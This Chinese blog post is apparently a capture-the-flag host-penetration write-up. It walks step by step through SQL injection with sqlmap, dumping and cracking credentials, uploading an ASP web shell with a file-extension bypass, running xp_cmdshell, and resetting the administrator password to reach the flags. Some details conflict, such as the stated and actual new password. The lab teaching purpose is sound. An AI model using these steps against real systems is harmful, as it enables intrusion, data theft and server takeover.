CTF之主机渗透系列三

2025-12-27 主机渗透

0x00 介绍
接着上一篇《CTF之主机渗透系列二》，咱们继续。还是那句话，任何工具使用均来自互联网，涉及到的技术仅用于教学，不得用于非法用途，请遵守国家安全法律法规，做一个正能量的安全人员。
试题如下：

文章插图

第一步：我们访问链接：http://202.0.0.23/

文章插图

进入网页首页，通过浏览观察，找到http://202.0.0.23/NewsList.asp?SortID=17 新闻资讯页面，通过get方法提交的参数名为SortID，值为1，我们尝试一下是否存在sql注入，通过sqlmap去跑一下

文章插图

文章插图
【CTF之主机渗透系列三】
发现存在sql注入漏洞sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 –dbs

文章插图

sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 -D Test_EIMS –tables

文章插图

sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 -D Test_EIMS -T eims_flag –dump

文章插图

查看账号密码的数据库表

文章插图

对b2076528346216b3进行md5解密，解密得密码为admin1234账号为root
第二步：接下来使用御剑后台扫描，找到后台登录页面

文章插图

文章插图

右键此页面查看源码，找到一个flag：

文章插图

第三步：使用账户root密码admin1234登录后台，在后台系统信息-文件上传处上传后缀为.asp的asp一句话木马，一句话木马内容：<%eval request("caidao")%> (按照asp一句话木马格式)

文章插图

结果提示上传文件格式不对，想下绕过办法

文章插图

这里我们将一句话木马文件改一个可执行的后缀.cer

文章插图

则上传成功第四步：下面我们直接上菜刀工具了

文章插图

在网站根目录发现flag文件flag3{23c5b149510105853f5e7ef9a6f06627}

文章插图

在数据库配置文件中找到数据库的账号密码

文章插图

使用一句话木马连接mssql数据库

文章插图

利用mssql数据库的xpcmdshell组件执行系统命令 EXEC master..xp_cmdshell 'whoami'

文章插图

当前cmdshell的权限是system权限，所以直接修改administrator的密码为hacker：EXEC master..xp_cmdshell 'net user administrator 123456'

文章插图

第五步：直接远程桌面连接服务器administrator/123456，在桌面发现flag文件，flag5{47baf6d9d60f40c8b1dafa56c62fcd06}

文章插图

文章插图

在c盘发现另外一个flag文件 flag4{e35a01e91e1833d266f95881ae83b4ca}

文章插图

至此，5个flag就找出来了，未完待续！！！
更多信安干货文章，请持续关注专栏
知了堂禁卫实验室?zhuanlan.zhihu.com

推荐阅读

上一篇：如何正确控制springboot中bean的加载顺序总结

下一篇：一款支持直播的开源录屏工具